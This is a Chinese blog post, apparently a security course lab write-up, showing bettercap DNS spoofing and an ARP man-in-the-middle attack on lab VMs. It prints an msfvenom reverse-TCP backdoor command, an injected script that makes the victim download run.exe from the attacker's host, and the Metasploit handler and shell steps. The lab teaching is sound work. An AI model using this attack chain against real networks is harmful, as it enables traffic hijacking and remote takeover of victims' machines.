<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon-32x32.ico">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.ico">
  <link rel="mask-icon" href="/images/favicon-16x16.ico" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-mac-osx.min.css">
  <script src="/lib/pace/pace.min.js"></script>


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.4.2',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":true,"show_result":true,"style":null},
    back2top: {"enable":true,"sidebar":true,"scrollpercent":true},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="软件综合训练—信息安全方向课程总结">
<meta property="og:type" content="article">
<meta property="og:title" content="使用bettercap进行渗透测试">
<meta property="og:url" content="https:&#x2F;&#x2F;fansblog.club&#x2F;2019&#x2F;09&#x2F;10&#x2F;hacker-1&#x2F;index.html">
<meta property="og:site_name" content="生如逆旅 一苇以航">
<meta property="og:description" content="软件综合训练—信息安全方向课程总结">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https:&#x2F;&#x2F;fansblog.club&#x2F;2019&#x2F;09&#x2F;10&#x2F;hacker-1&#x2F;dns.png">
<meta property="og:image" content="https:&#x2F;&#x2F;fansblog.club&#x2F;2019&#x2F;09&#x2F;10&#x2F;hacker-1&#x2F;win7_1.png">
<meta property="og:image" content="https:&#x2F;&#x2F;fansblog.club&#x2F;2019&#x2F;09&#x2F;10&#x2F;hacker-1&#x2F;runexe.png">
<meta property="og:image" content="https:&#x2F;&#x2F;fansblog.club&#x2F;2019&#x2F;09&#x2F;10&#x2F;hacker-1&#x2F;test1.png">
<meta property="og:image" content="https:&#x2F;&#x2F;fansblog.club&#x2F;2019&#x2F;09&#x2F;10&#x2F;hacker-1&#x2F;test2.png">
<meta property="og:image" content="https:&#x2F;&#x2F;fansblog.club&#x2F;2019&#x2F;09&#x2F;10&#x2F;hacker-1&#x2F;test3.png">
<meta property="og:image" content="https:&#x2F;&#x2F;fansblog.club&#x2F;2019&#x2F;09&#x2F;10&#x2F;hacker-1&#x2F;downrunexe.png">
<meta property="og:image" content="https:&#x2F;&#x2F;fansblog.club&#x2F;2019&#x2F;09&#x2F;10&#x2F;hacker-1&#x2F;sessions.png">
<meta property="og:image" content="https:&#x2F;&#x2F;fansblog.club&#x2F;2019&#x2F;09&#x2F;10&#x2F;hacker-1&#x2F;end.png">
<meta property="og:updated_time" content="2019-11-15T08:16:04.585Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https:&#x2F;&#x2F;fansblog.club&#x2F;2019&#x2F;09&#x2F;10&#x2F;hacker-1&#x2F;dns.png">

<link rel="canonical" href="https://fansblog.club/2019/09/10/hacker-1/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>使用bettercap进行渗透测试 | 生如逆旅 一苇以航</title>
  








  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <a href="https://github.com/aestheticisma" target="_blank" rel="noopener" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">生如逆旅 一苇以航</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">人生总有许多偶然和巧合，两条平行线，也可能会有交汇的一天。</p>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
        <li class="menu-item menu-item-friendly-link">

    <a href="/friendly-link/" rel="section"><i class="fa fa-fw fa-address-book"></i>友情链接</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://fansblog.club/2019/09/10/hacker-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang_n.jpeg">
      <meta itemprop="name" content="流岚">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="生如逆旅 一苇以航">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          使用bettercap进行渗透测试
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-09-10 23:02:45" itemprop="dateCreated datePublished" datetime="2019-09-10T23:02:45+08:00">2019-09-10</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2019-11-15 16:16:04" itemprop="dateModified" datetime="2019-11-15T16:16:04+08:00">2019-11-15</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%BD%AF%E4%BB%B6%E7%BB%BC%E5%90%88%E8%AE%AD%E7%BB%83%E8%AF%BE%E7%A8%8B/" itemprop="url" rel="index">
                    <span itemprop="name">软件综合训练课程</span>
                  </a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>软件综合训练—信息安全方向课程总结<a id="more"></a></p>
<p>（以下所有在虚拟机kali_linux下实现）</p>
<h3 id="一、bettercap是什么"><a href="#一、bettercap是什么" class="headerlink" title="一、bettercap是什么"></a>一、bettercap是什么</h3><p>bettercap是一款完整，模块化，轻量级，易扩展的中间人攻击测试工具和框架。</p>
<p><strong>如何安装？</strong></p>
<h4 id="1-安装依赖"><a href="#1-安装依赖" class="headerlink" title="1. 安装依赖"></a>1. 安装依赖</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install ruby-dev libpcap-dev</span><br></pre></td></tr></table></figure>

<h4 id="2-安装稳定版本（GEM）"><a href="#2-安装稳定版本（GEM）" class="headerlink" title="2. 安装稳定版本（GEM）"></a>2. 安装稳定版本（GEM）</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gem install bettercap</span><br></pre></td></tr></table></figure>

<p>至此，bettercap已成功安装，下面让我们开始吧！</p>
<h3 id="二、DNS欺骗"><a href="#二、DNS欺骗" class="headerlink" title="二、DNS欺骗"></a>二、DNS欺骗</h3><p>创建一个dns.conf文件，下面这个dns语句的意思是：所有的以<code>.com</code>结尾的网站全部解析到我的本地http服务器，<code>.*.com</code>就是一个正则，也可以是自定义的正则。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.1.1.1 .*.com</span><br></pre></td></tr></table></figure>

<p>之后使用bettercap命令进行DNS欺骗：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bettercap -X -I eth0 -T 192.168.73.129 -G 192.168.73.2 --dns dns.conf</span><br></pre></td></tr></table></figure>

<p>第一个ip地址为局域网内要攻击的主机ip地址，-G参数为网关。</p>
<p>为什么一定是局域网内的呢，因为我们利用的是ARP报文的广播原理，而ARP报文只能在同一网段内广播，因此我们需要将kali_linux与受攻击的win7在同一网段下，由于我是用VMwa re开了这两个虚拟机，都是利用nat链接，当然属于同一个网段啦！</p>
<p><img src="/2019/09/10/hacker-1/dns.png" alt="dns"></p>
<p>之后被攻击的win7主机会出现什么现象呢？</p>
<p><img src="/2019/09/10/hacker-1/win7_1.png" alt="win7_1"></p>
<p>可以看到，ping百度的域名却返回的是我们在dns.conf中写入的1.1.1.1</p>
<h3 id="三、ARP欺骗-msf"><a href="#三、ARP欺骗-msf" class="headerlink" title="三、ARP欺骗+msf"></a>三、ARP欺骗+msf</h3><p>Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目，可以协助安全工程师进行渗透测试及入侵检测系统签名开发。</p>
<p><strong>进行html注入中间人攻击</strong></p>
<h4 id="1-生成后门"><a href="#1-生成后门" class="headerlink" title="1. 生成后门"></a>1. 生成后门</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p  windows/meterpreter/reverse_tcp LHOST=192.168.73.128 LPORT=444 -f exe &gt; run.exe</span><br></pre></td></tr></table></figure>

<p>LHOST为监听主机ip，即攻击者ip。生成一个run.exe文件。</p>
<p><img src="/2019/09/10/hacker-1/runexe.png" alt="runexe"></p>
<h4 id="2-启动本地http服务"><a href="#2-启动本地http服务" class="headerlink" title="2. 启动本地http服务"></a>2. 启动本地http服务</h4><p>首先使用screen创建后台：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">screen -S test1</span><br></pre></td></tr></table></figure>

<p>​    之后输入：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m SimpleHTTPServer 8888</span><br></pre></td></tr></table></figure>

<p><img src="/2019/09/10/hacker-1/test1.png" alt="test1"></p>
<p>按ctrl+a+d返回。</p>
<h4 id="3-启动注入中间人攻击"><a href="#3-启动注入中间人攻击" class="headerlink" title="3. 启动注入中间人攻击"></a>3. 启动注入中间人攻击</h4><p>同样的，我们先使用screen创建一个新后台test2</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bettercap -I eth0 -X  -T 192.168.73.129  -G 192.168.73.2  --proxy-module=injecthtml --html-data <span class="string">"&lt;script&gt;document.body.onclick = function()&#123;window.open('http://192.168.73.128:8888/run.exe')&#125; &lt;/script&gt;"</span></span><br></pre></td></tr></table></figure>

<p><img src="/2019/09/10/hacker-1/test2.png" alt="test2"><br>按ctrl+a+d返回</p>
<h4 id="4-在本地启动监听"><a href="#4-在本地启动监听" class="headerlink" title="4. 在本地启动监听"></a>4. 在本地启动监听</h4><p>与前面一样，创建新后台test3。</p>
<p>之后输入命令如下所示：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">		msf &gt; </span><br><span class="line">		use exploit/multi/handler</span><br><span class="line">		<span class="built_in">set</span> payload windows/meterpreter/reverse_tcp</span><br><span class="line">		<span class="built_in">set</span> lhost 192.168.73.128</span><br><span class="line">		<span class="built_in">set</span> lport 444</span><br><span class="line">		run -j</span><br></pre></td></tr></table></figure>

<p><img src="/2019/09/10/hacker-1/test3.png" alt="test3"></p>
<h4 id="5-在被攻击端运行run-exe"><a href="#5-在被攻击端运行run-exe" class="headerlink" title="5. 在被攻击端运行run.exe"></a>5. 在被攻击端运行run.exe</h4><p>使用被攻击的win7虚拟机随便打开一个网页，比如 <a href="http://www.baidu.com" target="_blank" rel="noopener">www.baidu.com</a> 之后随便点击一个地方，就会触发我们注入html源码中的函数，跳转到我们的攻击主机ip+端口的web服务上并下载run.exe文件，若点击运行，则被攻击主机的控制权我们就可以拿到了。</p>
<p><img src="/2019/09/10/hacker-1/downrunexe.png" alt="download"></p>
<h4 id="6-获得被攻击主机的控制权"><a href="#6-获得被攻击主机的控制权" class="headerlink" title="6. 获得被攻击主机的控制权"></a>6. 获得被攻击主机的控制权</h4><p>在我们的监听会话中我们输入<code>sessions</code>命令可以看到如下内容：</p>
<p><img src="/2019/09/10/hacker-1/sessions.png" alt="sessions"></p>
<p>​    我们可以看到id为1的主机便是我们攻击的主机，那么接下来怎么获取它的控制权呢，很简单，我们只要输入：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sessions 1</span><br><span class="line">meterpreter &gt; shell</span><br></pre></td></tr></table></figure>

<p><code>meterpreter &gt;</code>为输入<code>sessions 1</code>之后的提示符不需要输入。</p>
<p>​    接下来我们便可以看到如下内容：</p>
<p><img src="/2019/09/10/hacker-1/end.png" alt="end"></p>
<p>这个界面是不是很熟悉呢，嘿嘿嘿</p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>流岚
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://fansblog.club/2019/09/10/hacker-1/" title="使用bettercap进行渗透测试">https://fansblog.club/2019/09/10/hacker-1/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/null" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
                <a href="/2019/08/27/multiprocessing/" rel="next" title="Python 多进程">
                  <i class="fa fa-chevron-left"></i> Python 多进程
                </a>
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
                <a href="/2019/09/11/hacker-2/" rel="prev" title="攻防夺旗DC1">
                  攻防夺旗DC1 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#一、bettercap是什么"><span class="nav-text">一、bettercap是什么</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-安装依赖"><span class="nav-text">1. 安装依赖</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-安装稳定版本（GEM）"><span class="nav-text">2. 安装稳定版本（GEM）</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#二、DNS欺骗"><span class="nav-text">二、DNS欺骗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#三、ARP欺骗-msf"><span class="nav-text">三、ARP欺骗+msf</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-生成后门"><span class="nav-text">1. 生成后门</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-启动本地http服务"><span class="nav-text">2. 启动本地http服务</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-启动注入中间人攻击"><span class="nav-text">3. 启动注入中间人攻击</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-在本地启动监听"><span class="nav-text">4. 在本地启动监听</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-在被攻击端运行run-exe"><span class="nav-text">5. 在被攻击端运行run.exe</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6-获得被攻击主机的控制权"><span class="nav-text">6. 获得被攻击主机的控制权</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="site-author-image" itemprop="image" alt="流岚"
    src="/images/touxiang_n.jpeg">
  <p class="site-author-name" itemprop="name">流岚</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/aestheticisma" title="GitHub &amp;rarr; https:&#x2F;&#x2F;github.com&#x2F;aestheticisma" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/u/5975330626" title="Weibo &amp;rarr; https:&#x2F;&#x2F;weibo.com&#x2F;u&#x2F;5975330626" rel="noopener" target="_blank"><i class="fa fa-fw fa-weibo"></i>Weibo</a>
      </span>
  </div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        


<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">流岚</span>
</div>


  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v4.0.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.4.2
  </div>

        












        
      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>



  


















  

  

  

  

  <!-- 背景动画 -->
<script type="text/javascript" src="/js/particle.js"></script>
  <!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/click_love.js"></script>
  <!--页面崩溃-->
<script type="text/javascript" src="/js/crash_cheat.js"></script>
</body>

</html>
